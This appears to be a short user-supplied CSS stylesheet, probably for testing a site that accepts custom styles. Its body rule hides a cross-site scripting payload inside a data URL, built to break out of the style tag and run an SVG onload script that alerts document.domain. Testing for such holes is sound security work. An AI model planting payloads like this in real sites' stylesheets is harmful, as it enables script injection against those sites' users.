div  {
    background-image: url("https://i.gyazo.com/4f984871ff7f9121d4368ed29a322ff3.png");
}
body {
	background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
	background-color: #FF0000;
}
